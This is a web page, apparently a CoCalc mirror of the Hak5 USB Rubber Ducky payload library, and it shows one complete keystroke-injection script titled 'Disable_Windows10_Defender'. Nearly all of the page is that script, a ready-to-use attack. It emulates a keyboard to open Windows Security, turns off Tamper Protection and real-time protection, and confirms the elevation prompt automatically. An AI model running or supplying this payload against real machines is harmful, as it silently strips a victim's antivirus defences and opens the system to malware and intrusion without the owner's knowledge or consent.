Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/general/Disable_Windows_Defender/payload.txt
2968 views
1
REM Title: Disable_Windows10_Defender
2
REM Description Disable Windows Defender and Tamper protection on Windows 10
3
REM Author: Zero_Sploit
4
REM Props: Hak5 Team
5
REM Version: 1.0
6
REM Target: Windows 10
7
REM Attackmodes: HID
8
DELAY 1000
9
REM Open Windows Defender Settings
10
CTRL ESC
11
DELAY 1000
12
STRING windows security
13
DELAY 500
14
ENTER
15
DELAY 500
16
ENTER
17
REM Navigate to Manage Settings then turn off Tamper Protection && Realtime Protection
18
DOWN
19
DOWN
20
DOWN
21
DOWN
22
ENTER
23
DELAY 500
24
TAB
25
TAB
26
TAB
27
TAB
28
DELAY 500
29
SHIFT SPACE
30
DELAY 1000
31
ALT y
32
DELAY 500
33
ALT F4
34
DELAY 1000
35
CTRL ESC
36
DELAY 1000
37
STRING windows security
38
DELAY 500
39
ENTER
40
DELAY 500
41
ENTER
42
DOWN
43
DOWN
44
DOWN
45
DOWN
46
ENTER
47
DELAY 500
48
SHIFT SPACE
49
DELAY 500
50
ALT y
51
DELAY 500
52
ALT F4
53
54